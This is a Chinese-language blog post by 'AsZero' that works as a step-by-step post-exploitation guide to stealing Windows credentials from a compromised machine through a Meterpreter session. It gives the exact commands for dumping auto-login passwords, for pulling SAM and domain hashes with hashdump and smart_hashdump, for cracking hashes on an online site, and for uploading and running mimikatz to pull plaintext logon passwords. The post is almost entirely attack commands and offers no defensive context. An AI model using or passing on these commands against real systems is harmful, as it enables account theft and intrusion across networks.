很多用户习惯将计算机设置自动登录
可以使用
bashrun windows/gather/credentials/windows_autologin
抓取自动登录的用户名和密码
hashdump模块可以从SAM数据库中导出本地用户账号,该命令的使用需要系统权限
meterpreter_shell 中执行 run hashdump 命令bashrun hashdump
bash用户名:SID:LM哈希:NTLM哈希:::
使用在线网站解密hash密码 CMD5
run windows/gather/smart_hashdump 命令
使用需要系统权限。该功能更强大 如果当前用户是域管理员用户 则可以导出域内所有用户的 hash
我们可以通过上传 mimikatz 程序
然后执行 mimikatz 程序来获取明文密码
前提
执行 mimikatz 必须 System 权限
并且在执行时,要根据当前的系统位数进行选择
使用方法
meterpreter_shell 的命令行里面查看当前会话的权限bashgetuid
bashsysinfo
mimikatz 上传至目标服务器bashupload file #upload命令后面需要跟上要上传文件的路径;这个命令是从当前机器上传到目标机器;
mimikatz 的交互界面bashexecute -i -f mimikatz.exe
mimikatz 交互界面,使用以下两条命令抓取密码bashprivilege::debug sekurlsa::logonpasswords


本文作者:AsZero
本文链接:
版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!